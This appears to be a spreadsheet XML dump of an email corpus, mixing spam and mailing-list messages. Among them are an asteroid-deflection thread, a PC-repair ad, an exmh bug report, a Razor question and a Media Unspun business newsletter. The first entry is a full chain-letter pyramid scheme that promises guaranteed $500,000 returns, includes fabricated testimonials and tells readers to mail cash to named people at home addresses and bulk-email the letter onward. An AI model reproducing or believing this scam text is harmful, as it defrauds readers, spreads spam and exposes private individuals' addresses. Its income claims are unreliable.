 =PRINT THIS NOW FOR YOUR
 FUTUREREFERENCE
 ===============================
 ===============
 If you would like to make at least $500,000
 every 4 to 5
 months easily and comfortably, please read
 the
 following...THEN READ IT AGAIN and
 AGAIN!!!
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 $$$$$$$$$$$$$$$
 FOLLOW THE SIMPLE INSTRUCTION
 BELOW AND
 YOUR FINANCIAL DREAMS WILL COME
 TRUE,
 GUARANTEED! INSTRUCTIONS:
 =====Order all 5 reports shown on the list
 below =====
 For each report, send $5 CASH, THE
 NAME &amp; NUMBER
 OF THE REPORT YOU ARE ORDERING
 and YOUR E-
 MAIL ADDRESS to the person whose
 name appears ON THAT LIST next to the
 report. MAKE
 SURE YOUR RETURN ADDRESS IS ON
 YOUR
 ENVELOPE TOP LEFT CORNER in case
 of any mail
 problems.
 === When you place your order, make sure
 you order each of
 the 5 reports.  You will need all 5 reports so
 that you can save
 them on your  computer and resell them.
 YOUR TOTAL
 COST $5 X 5=$25.00.
 Within a few days you will receive, vie e-
 mail, each of the 5
 reports from these 5 different individuals.
 Save them on your
 computer so they  will be accessible for you
 to send to the
 1,000's of people who will order them from
 you. Also make a
 floppy of these reports and keep them on
 your desk in case
 something happens to your computer.
 IMPORTANT - DO NOT alter the names of
 the people who
 are listed next to each report, or their
 sequence on the list, in
 any way other than what is instructed
 below in step '' 1
 through 6 '' or you will loose the majority of
 your profits.
 Once you understand the way this works,
 you will also see
 how it does not work if you change it.
 Remember, this
 method has been tested, and if you alter, it
 will NOT work !!!
 People have tried to put their
 friends/relatives names on all
 five thinking they could get all the money.
 But it does not
 work this way. Believe us, we all have tried
 to be greedy and
 then nothing happened. So Do Not try to
 change anything
 other than what is instructed. Because if
 you do, it will not
 work for you.
 Remember, honesty reaps the reward!!!
 1.... After you have ordered all 5 reports,
 take this
 advertisement and REMOVE the name &amp;
 address of the
 person in REPORT # 5. This person has
 made it through the
 cycle and is no doubt counting their fortune.
 2.... Move the name &amp; address in
 REPORT # 4 down TO
 REPORT # 5.
 3.... Move the name &amp; address in
 REPORT # 3 down TO
 REPORT # 4.
 4.... Move the name &amp; address in
 REPORT # 2 down TO
 REPORT # 3.
 5.... Move the name &amp; address in
 REPORT # 1 down TO
 REPORT # 2
 6.... Insert YOUR name &amp; address in the
 REPORT # 1
 Position. PLEASE MAKE SURE you copy
 every name &amp;
 address ACCURATELY!
 ===============================
 =============
 **** Take this entire letter, with the modified
 list of names,
 and save it on your computer. DO NOT
 MAKE ANY OTHER
 CHANGES.
 Save this on a disk as well just in case if
 you loose any data.
 To assist you with marketing your business
 on the internet, the
 5 reports you purchase will provide you with
 invaluable
 marketing information which includes how
 to send bulk e-
 mails legally, where to find thousands of
 free classified ads
 and much more. There are 2 Primary
 methods to get this
 venture going: METHOD # 1: BY
 SENDING BULK E-MAIL
 LEGALLY
 ===============================
 =============
 Let's say that you decide to start small, just
 to see how it goes,
 and we will assume You and those
 involved send out only
 5,000 e-mails each.  Let's also assume that
 the mailing receive
 only a 0.2% response (the response could
 be much better but
 lets just say it is only 0.2%. Also many
 people will send out
 hundreds of thousands e-mails instead of
 only 5,000 each).
 Continuing with this example, you send out
 only 5,000 e-
 mails. With a 0.2% response, that is only
 10 orders for report #
 1. Those 10 people responded by sending
 out 5,000 e-mail
 each for a total of 50,000. Out of those
 50,000 e-mails only
 0.2% responded with orders.
 That's=100 people responded and ordered
 Report # 2.
 Those 100 people mail out 5,000 e-mails
 each for a total of
 500,000 e-mails.  The 0.2% response to
 that is 1000 orders for
 Report # 3.
 Those 1000 people send out 5,000 e-mails
 each for a total of 5
 million e-mails sent out. The 0.2% response
 to that is 10,000
 orders for report #4.  Those 10,000 people
 send out 5,000 e-
 mails each for a total of 50,000,000 (50
 million) e-mails. The
 0.2% response to that is 100,000 orders for
 Report  # 5.
 THAT'S 100,000 ORDERS TIMES $5
 EACH=$500,000.00
 (half million).
 Your total income in this example is: 1.....
 $50 + 2..... $500 +
 3.....$5,000 + 4 . $50,000 + 5..... $500,000
 ....... Grand
 Total=$555,550.00
 NUMBERS DO NOT LIE. GET A PENCIL
 &amp; PAPER AND
 FIGUREOUT THE WORST POSSIBLE
 RESPONSES AND
 NO MATTER HOW YOU CALCULATE IT,
 YOU WILL
 STILL MAKE A LOT OF MONEY !
 ===============================
 =============
 REMEMBER FRIEND, THIS IS
 ASSUMING ONLY 10
 PEOPLE ORDERING OUT OF 5,000 YOU
 MAILED TO.
 Dare to think for a moment what would
 happen if everyone or
 half or even one 4th of those people mailed
 100,000e-mails
 each or more? There are over 150 million
 people on the
 Internet worldwide and counting. Believe
 me, many people
 will do just that, and more! METHOD # 2 :
 BY PLACING
 FREE ADS ON THE INTERNET
 ===============================
 =============
 Disclaimer: Your earnings and results are highly dependent on your
 individual efforts and results. This web page constitutes no guarantees
 of any income, whether stated nor implied. Any earnings projections
 shown on this website are for example and educational purposes only.
 Actual results will vary according to each individual member's activity. In
 general, the more you work the plan the better your results.
 Advertising on the net is very very
 inexpensive and there are
 hundreds of FREE places to advertise.
 Placing a lot of free ads
 on the Internet will easily get a larger
 response. We strongly
 suggest you start with Method # 1 and
 METHOD # 2 as you
 go along. For every $5 you receive, all you
 must do is e-mail
 them the Report they ordered. That's it.
 Always provide same
 day service on all orders. This will
 guarantee that the e-mail
 they send out, with your name and address
 on it, will be
 prompt because they can not advertise until
 they receive the
 report.
 =========== AVAILABLE REPORTS
 ============
 ORDER EACH REPORT BY ITS
 NUMBER &amp; NAME
 ONLY. Notes: Always send $5 cash (U.S.
 CURRENCY) for
 each Report. Checks NOT
 accepted. Make sure the cash is concealed
 by wrapping it in at
 least 2 sheets of paper. On one of those
 sheets of paper, Write
 the NUMBER &amp; the NAME of the Report
 you are ordering,
 YOUR E-MAIL ADDRESS and your name
 and postal
 address.
 PLACE YOUR ORDER FOR THESE
 REPORTS NOW :
 ===============================
 =============
 REPORT # 1: "The Insider's Guide to
 Advertising for Free on
 the Net" Order Report #1 from:
 Corey Timmons
 2756 Davis Mills Road
 Hephzibah, GA 30815
 ___________________________________
 _______________
 REPORT # 2: "The Insider's Guide to
 Sending Bulk e-mail on
 the Net"
 Chester  Waldvogel
 11 Chestnut Way
 Berlin, MD, 21811
 ___________________________________
 ______________
 REPORT # 3: "Secret to Multilevel
 Marketing on the Net"
 Order Report # 3 from :
 Daniel Lee
 306 Spring Street
 Hendersonville, NC 28739, USA
 ___________________________________
 _______________
 REPORT # 4: "How to Become a
 Millionaire Utilizing MLM
 &amp; the Net"  Order Report # 4 from:
 H.A.
 416 3rd. Ave. West
 Hendersonville, NC 28739, US
 ____________________________
 ______________________
 REPORT #5: "How to Send Out 0ne Million
 e-mails for Free"
 Order Report # 5 from:
 Mike Manegold
 Sonnenbergstrasse 40
 CH-8800, Thalwil (Switzerland)
 ___________________________________
 _______________
 $$$$$$$$$ YOUR SUCCESS
 GUIDELINES $$$$$$$$$$$
 Follow these guidelines to guarantee your
 success:
 === If you do not receive at least 10 orders
 for Report #1
 within 2 weeks, continue sending e-mails
 until you do.
 === After you have received 10 orders, 2
 to 3 weeks after that
 you should receive 100 orders or more for
 REPORT # 2. If
 you did not, continue advertising or sending
 e-mails until you
 do.
 === Once you have received 100 or more
 orders for Report #
 2, YOU CAN RELAX, because the system
 is already working
 for you, and the cash will continue to roll in !
 THIS IS
 IMPORTANT TO REMEMBER:
 Every time your name is moved down on
 the list, you are
 placed in front of a Different report. You can
 KEEP TRACK
 of your PROGRESS by watching which
 report people are
 ordering from you. IF YOU WANT TO
 GENERATE MORE
 INCOME SEND ANOTHER BATCH OF E-
 MAILS AND
 START THE WHOLE PROCESS AGAIN.
 There is NO
 LIMIT to the income you can generate
 from this business !!!
 ===============================
 =============
 FOLLOWING IS A NOTE FROM THE
 ORIGINATOR OF
 THIS PROGRAM: You have just received
 information that
 can give you financial freedom for the rest
 of your life, with
 NO RISK and JUST A LITTLE BIT OF
 EFFORT. You can
 make more money in the next few weeks
 and months than you
 have ever imagined. Follow the program
 EXACTLY AS
 INSTRUCTED. Do Not change it in any
 way. It works
 exceedingly well as it is now.
 Remember to e-mail a copy of this exciting
 report after you
 have put your name and address in Report
 #1 and moved
 others to #2 ...........# 5 as instructed
 above. One of the people
 you send this to may send out 100,000 or
 more e-mails and
 your name will be on every one of them.
 Remember though, the more you send out
 the more potential
 customer you will reach. So my friend, I
 have given you the
 ideas, information, materials and
 opportunity to become
 financially independent. IT IS UP TO YOU
 NOW !
 ======== MORE TESTIMONIALS
 ============
 "My name is Mitchell. My wife, Jody and I
 live in Chicago. I
 am an accountant with a major U.S.
 Corporation and I make
 pretty good money. When I received this
 program I grumbled
 to Jody about receiving ''junk mail''. I made
 fun of the whole
 thing, spouting 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received total $ 147,200.00 ........... all
 cash! I was
 shocked. I have joined Jody in her ''hobby''.
 Mitchell Wolf C.P.A., Chicago, Illinois
 ===============================
 ===========
 ''Not being the gambling type, it took me
 several weeks to
 make up my mind to participate in this plan.
 But conservative
 that I am, I decided that the initial
 investment was so little that
 there was just no way that I wouldn't get
 enough orders to at
 least get my money back''. '' I  was
 surprised when I found my
 medium size post office box  crammed with
 orders. I made
 $319,210.00in the first 12 weeks.  The nice
 thing about this
 deal is that it does not matter where 
 people live. There simply
 isn't a better investment with a faster return
 and so big." Dan
 Sondstrom, Alberta, Canada
 ===============================
 ============
 ''I had received this program before. I
 deleted it, but later I
 wondered if I should have given it a try. Of
 course, I had no
 idea who to contact to get another copy, so
 I had to wait until I
 was e-mailed again by someone
 else.........11 months passed
 then it luckily came again...... I did not
 delete this one! I made
 more than $490,000 on my first try and all
 the money came
 within 22 weeks." Susan De Suza, New
 York, N.Y.
 ===============================
 =============
 ''It really is a great opportunity to make
 relatively easy money
 with little cost to you. I followed the simple
 instructions
 carefully and within 10 days the money
 started to come in. My
 first month I made $20,560.00 and by the
 end of third month
 my total cash count was $362,840.00. Life
 is beautiful, Thanks
 to the internet.". Fred Dellaca, Westport,
 New Zealand
 ===============================
 =============
 ORDER YOUR REPORTS TODAY AND
 GET STARTED
 ON'YOUR' ROAD TO FINANCIAL
 FREEDOM !
 ===============================
 ============
 Disclaimer: Your earnings and results are highly dependent on your
 individual efforts and results. This web page constitutes no guarantees
 of any income, whether stated nor implied. Any earnings projections
 shown on this website are for example and educational purposes only.
 Actual results will vary according to each individual member's activity. In
 general, the more you work the plan the better your results.
 If you have any questions of the legality of
 this program,
 contact the Office of Associate Director for
 Marketing
 Practices, Federal Trade Commission,
 Bureau of Consumer
 Protection, Washington, D.C.
 (Note: To avoid delays make sure
 appropriate postage to
 Canada, USA, or Europe is applied
 -=-=-=-=--=-=-==-=Remove Instructions=-=-
 =-=-=-=-=--=-=
 *************************************************
 Do not reply to this message -
 To be removed from future mailings:
 mailto:areyousure@angelfire.com?Subject=
 Remove
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Gordon Mohr &lt;gojomo@usa.net&gt; writes:
     G&gt; Voila! No collision -- at least not with the initial
     G&gt; threat. And no need to travel out to anywhere near the meteor,
     G&gt; either. Just the moon.
 Yeah, right.  Considering the Genesis project just won an award for
 figuring out (surprise, surprise) that N-body problems with 10+ bodies
 yield some interesting synergetic surprises ...  suffice it to say
 that the issue has been hashed over in sci.astro many, many times,
 since even long before Hollywood posed the problem, and the very best
 advice is still "duck and cover"; if you are still going to nudge
 anything, though, I'd nudge the rock (the one the size of a small
 town) as you're less likely to re-define global agriculture that way.
 'Course, you're gonna have this problem of distributing the force over
 a large enough surface area that it translates into a resillient
 compression wave instead of a knifeblade/diamond faultline split.
 It's also not a game of billiards, but a 6+ dimensional collision
 problem (space, time, spin, temp, maybe electromag too if there's any
 heavy metals in it, and there often is) complete with relativistic
 effects and everything. Hands up all those with experience subjecting
 blackboxed alien geology to sustained forces in excess of 100 megatons
 (10% of it's own momentum).  I'm going to trust the US Army with this
 when they can't even /find/ more than a few hundred Al Queda in a
 desert? 
 Oh, another problem: It's not the only rock out there.  We're just
 getting better at spotting them.
 Tell ya what: when you cowboys do get ready to bally-hootin' out to
 blow-er-up-real-good, you let me know, eh, so I can move the the next
 solar system before you do.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: UK's Leading PC Specialist
</t>
  </si>
  <si>
    <t xml:space="preserve">Nationwide PC Repairs and Upgrades
 *No call out charges.
 *No hourly charges.
 *Picked up from your home and returned safely anywhere in the UK.
 *Diagnosed and repaired by certified engineer
 *We will meet and beat any price
 For more information click on the link below;
 http://www.qpas.co.uk/pcclinic.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Bug report: msg n+1 marked read
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-1577134449P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Wed, 25 Sep 2002 23:22:26 +0200
 &gt;
 &gt; 
 &gt; It seems that something changed during the last 3-4 weeks.
 &gt; 
 &gt; 1) In a folder, msgs 1-n is read, n=current, n upwards is unread.
 &gt; 2) change to another folder
 &gt; 3) change back to the original folder and you'll see msg n+1 being 
 &gt; highlighted as current for a split second, that it changes back to 
 &gt; n=current.
 &gt; 
 &gt; Kind of annoying since it marks msg n+1 as read.
 I haven't seen what you describe, but I just saw something close to what you 
 describe.  I think the message that's being incorrectly highlighted as current
 is related to the current message in the other folder rather than being n+1.
 I'll have to investigate a bit more to identify and fix the bug, but there is 
 something going on here.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-1577134449P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9kxPXK9b4h5R0IUIRAq5fAJ43lzUupVkBkj6iJ5Rn7BsBQH5AywCfTAl2
 TJnhSBCb4C+1vyt/QjnVOOQ=
 =94lB
 -----END PGP SIGNATURE-----
 --==_Exmh_-1577134449P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] empty mail is spamm?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 Is it possible to use razor without filtering empty mails as spamm?
 An mail with an attachment is considered spamm. Is this normal?
 Or I mysqlf like to send emails to myself where all important is said in
 subject and body is empty (for remaining smth).
 Thanks,
 Raido Kurel
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format...
 ------------=_1033046883-23957-4
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 To view this newsletter in full-color, visit:
 http://newsletter.mediaunspun.com/index000020868.cfm
 Media Unspun
 What the Press is Reporting and Why (www.mediaunspun.com)
 -----------------------------------------------------------------
 September 26, 2002
 -----------------------------------------------------------------
 IN THIS ISSUE
 -----------------------------------------------------------------
 * AOL KEYWORD: FRAUD PROBE
 * VIVENDI MEETS THE NEW BOSS
 * OTHER STORIES
 -----------------------------------------------------------------
 EDITOR'S NOTE
 -----------------------------------------------------------------
 Is Media Unspun useful to you? Then pass it on to a colleague.
 The more readers we have, the more successful we'll be. The more 
 successful we are, the more useful we can be to you. Pass it
 on!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ADVERTISEMENT
 -----------------------------------------------------------------
 Pop!Tech 2002
 October 18 - 20, 2002: Camden, Maine
 Join 500 big thinkers to discuss
 the collision of technology and culture
 Register now at: http://www.poptech.org
 -----------------------------------------------------------------
 AOL KEYWORD: FRAUD PROBE
 -----------------------------------------------------------------
 Another three bite the dust. Three former executives from real
 estate dot-com Homestore have agreed to plead guilty to criminal 
 charges and repay $4.6 million in stock gains. What's more
 interesting is that they'll cooperate with an investigation into 
 AOL's role in the dubious dealing. This is the most real estate
 drama you'll get this week without renting "Glengarry Glen
 Ross."
 Homestore's former COO was charged with wire fraud and
 conspiracy to commit securities fraud (up to 10 years in jail),
 the former CFO with just the conspiracy charge (up to five
 years), and an ex-VP with insider trading (less time, but
 unknown). The big accusation here is "round tripping," in which
 Homestore would buy goods from a company as long as the company
 then spent most of the money on AOL ads. Then AOL would
 supposedly spend the same amount of money at Homestore, "thus
 allowing Homestore effectively to 'buy' revenue using its own
 cash," explained the Wall Street Journal.
 Homestore has become a cause celebre for Attorney General John
 Ashcroft, who held a press conference to emphasize that the Bush 
 administration really means it about this corporate clean-up
 thing. Neither Ashcroft, the Justice Department, nor the SEC
 named names, referring only to Homestore's relationship with "a
 major media company." Nice try for anonymity, but AOL Time
 Warner was the only major media company Homestore dealt with,
 observed the New York Times. Now the heat's on AOL while
 investigators try and figure out how much of AOL's revenue was
 inflated like a Thanksgiving Day Parade float.
 The L.A. Times' sources said AOL execs pointed the finger at
 former company dealmaker Eric Keller. The Journal led with, and
 expanded on, this info. It seems two of the three busted
 Homestore execs are expected to say Keller helped Homestore do
 its round-tripping, and that some AOL ad revenue that looked
 legit on paper really came from Homestore. Keller has already
 been pink-slipped for shady deals with Homestore and another
 company; his boss got booted last month for possible
 book-cooking. 
 So where's the perp walk? The umbrella stand? The theatrics that 
 make the corporate crime beat great? We're kidding (mostly), but 
 that could be why overseas outlets barely noticed this
 comparatively tame example of American excess. The Journal had
 one amusing tidbit, though: After Keller got fired, AOL vice
 chairman Ted Leonsis hired him as a consultant for the hockey
 team the Washington Capitals, of which Leonsis is the majority
 owner. Leonsis said he let Keller go after finding out why he
 lost his AOL job, but Keller still picked up his Capitals phone
 as of Wednesday. As outrageous severance packages go, it's no
 Jack Welsh/GE $9 million annual pension, but it'll have to do. - 
 Jen Muehlbauer
 Homestore Executives Agree to Guilty Pleas 
 http://www.washingtonpost.com/wp-dyn/articles/A3165-2002Sep25.html
 Homestore, AOL Ad Deals Yield Guilty Pleas (USA Today)
 http://tinyurl.com/1nbz
 U.S. Focuses on Executive at Homestore
 http://www.nytimes.com/2002/09/26/technology/26AOL.html
 Homestore's Ex-Execs to Aid Investigators
 http://www.latimes.com/business/la-fi-homestore26sep26,0,5107257.story
 Probe of Homestore Turns To an Ex-AOL Executive
 http://online.wsj.com/article/0,,SB1032971619118707713,00.html
 (Paid registration required.)
 Jack Welch's Very Golden Years 
 http://www.fool.com/news/Take/2002/mft/mft02090903.htm
 Glengarry Glen Ross 
 http://us.imdb.com/Title?0104348
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 What's Really Going on at Microsoft? Mary Jo Foley delivers
 unmatched reporting and insight with MICROSOFT WATCH.  Track
 initiatives like .Net, Palladium, Longhorn, Trinity, Yukon;
 release dates, competitive moves, people. For a FREE 14-day
 trial subscription:
 https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075
 -----------------------------------------------------------------
 VIVENDI MEETS THE NEW BOSS
 -----------------------------------------------------------------
 What does Vivendi want to be when it grows up? The media can't
 figure it out. Can CEO Jean-Rene Fourtou? His fuzziness at
 yesterday's board meeting got reporters to wondering. If he
 can't explain his vision, does that mean he's lacking the 20/20
 clarity that observers on two continents were banking on? For
 Fourtou, worse than the Monsieur Magoo accusations are the
 comparisons, starting to bubble through media accounts, that he
 resembles -- wait, we're rubbing our eyes -- the vilified
 Jean-Marie Messier.
 Media watchers can rate reporters' confusion over Fourtou's
 latest pronouncements by tallying the amount of space outlets
 devoted to their coverage of the mess. The New York Times ran 24 
 paragraphs on the board meeting -- and then filed another 19 in
 an analysis that sought to examine what the latest moves meant.  
 The Financial Times posted two articles on the meeting and still 
 had more to say, lambasting Fourtou in Lex, the peach paper's
 influential column. Lex called the exec's update "more like a
 rambling fireside chat ... than a strategy presentation."
 There's little that's clear about what's ahead for Vivendi. The
 company now says that it will dispose of 12 billion euros worth
 of assets over the next 18 months. Here's how reporters
 examining the tea leaves read the current plan: Out are Telepiu, 
 an Italian pay-TV operation, and Canal Plus Technologies, a
 maker of set-top boxes. On the way out are Vivendi's publishing
 properties, which include Houghton Mifflin, and a minority stake 
 in a PC gamemaker. That leaves Vivendi's stake in telecom, via
 its Cegetel investment, and its Universal entertainment
 properties, and -- hey, wait a minute, wasn't that Messier's
 plan, the New York Times wondered by way of an analyst's quote.
 To confuse matters further, News Corp., the alleged partner in
 the done deal for Telepiu, says no deal is in place, according
 to the Financial Times. As for Cegetel, Fourtou said he'd
 consider selling Vivendi's 44% stake; then again, maybe he'll
 increase it. And that was all in one post-meeting telephone
 conference. 
 The only decision by Vivendi in which Fourtou seemed sure was
 his claim that the company won't pay any severance to Messier.
 "He enjoyed making deals too much and overpaid," the Guardian
 quoted Fourtou as saying, and then adding, "This all went to his 
 head." 
 With heads other than Messier's now in question, is Vivendi's
 viability again in doubt? Outlets today report that Enron's
 logo, the oversize capital "E" that stood outside its
 headquarters, sold at auction for $44,000. How many euros might
 a V bring? - Deborah Asbrand
 Vivendi Will Move Quickly to Sell Many Assets
 http://www.nytimes.com/2002/09/26/business/26VIVE.html
 What's New at Vivendi? Depends Who's Talking
 http://www.nytimes.com/2002/09/26/business/26PLAC.html
 Vivendi in Move to Sell Raft of Assets (Financial Times)
 http://tinyurl.com/1ncq
 Vivendi Board to Deny Messier Severance Pay (Financial Times)
 http://tinyurl.com/1ncs
 Lex: Vivendi Universal (Financial Times) 
 http://tinyurl.com/1ncw
 News Corp Counters Report of Telepiu Sale (Financial Times)
 http://tinyurl.com/1ncy
 Vivendi Aims to Realise Eu12bn from Asset Sales (Daily
 Telegraph)
 http://tinyurl.com/1nd0
 Messier 'won't get a penny' 
 http://media.guardian.co.uk/city/story/0,7497,799283,00.html
 Vivendi Shakes Up Board, Denies Messier's Severance
 http://www.latimes.com/business/la-fi-vivendi26sep26,0,481695.story
 Enron Auctions Off Furniture and Famous 'E'
 http://www.nytimes.com/2002/09/26/business/26ENRO.html
 -----------------------------------------------------------------
 OTHER STORIES
 -----------------------------------------------------------------
 HP Boosts Layoffs By 1,800
 http://www.siliconvalley.com/mld/siliconvalley/4151819.htm
 Former WorldCom Controller To Plead Guilty To Two counts (Wall
 Street Journal)
 http://www.msnbc.com/news/813048.asp
 Tyco Rewarded an Executive During a Grand Jury Inquiry
 http://www.nytimes.com/2002/09/26/business/26PAY.html
 Bell Labs Researcher Falsified Experiments (AP)
 http://www.chron.com/cs/CDA/story.hts/tech/news/1591103
 Germany's Neuer Markt to close
 http://news.bbc.co.uk/2/hi/business/2283068.stm
 Resources Dry Up As Joblessness Drags On (USA Today)
 http://tinyurl.com/1nc1
 Merrill Aide to Plead Guilty (Wall Street Journal)
 http://www.msnbc.com/news/813195.asp?0dm=B21AB
 Enron Ex-CFO Clears His Throat For Feds 
 http://www.nypost.com/business/57905.htm
 Music Labels Seek Piracy Payback
 http://www.latimes.com/business/la-fi-napster26sep26001431,0,388519.story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http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@example.com
 To receive future messages in HTML format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Chtm
 To change your subscriber information, use this link:
 http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@example.com
 ------------=_1033046883-23957-4
 Content-Type: text/html; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;title&gt;Media Unspun&lt;/title&gt;
 &lt;!--  
 **********************************************************
 If you can read this message but the rest of the email 
 contains strange characters, your email program is not
 capable of displaying HTML email. Use your browser to read the
 complete newsletter online at: 
    http://newsletter.mediaunspun.com/
 To receive future messages in plain text format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Ctxt
 **********************************************************
 CREATED: September 26, 2002 
 --&gt;
 &lt;meta name="description" content=""&gt;
 &lt;meta name="keywords" content=""&gt;
 &lt;meta name="GENERATOR" content="iMakeNews"&gt;
 &lt;meta name="robots" content="all"&gt;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.a269926923529985-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a269926923529985-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923529985-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a269926923529985-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923529985-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923529985-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923529985-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923529985-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a269926923529985-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923529985-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a269926923529985-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a269926923523143-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a269926923523143-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a269926923523143-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a269926923521810-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a269926923521810-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a269926923521810-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a269926923549919-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a269926923549919-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923549919-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a269926923549919-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923549919-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923549919-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923549919-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923549919-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a269926923549919-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923549919-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a269926923549919-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}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000020868.cfm&amp;XXDESXXissue_id=20868&amp;XXDESXXtitle=Media%20Unspun"
 			 class="a269926923529985-footer_tellafriend"&gt;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src="http://a298.g.akamai.net/7/298/5382/092602092354/www.imakenews.com/mediaunspun/mediaunspun_logo.GIF" BORDER="0" alt="Media Unspun"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Thursday, September 26, 2002
 				&lt;/font&gt;
 			&lt;/td&gt;
 				&lt;td align="center" width="34%"&gt;
 			&lt;/td&gt;
 				&lt;td align="right" width="33%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
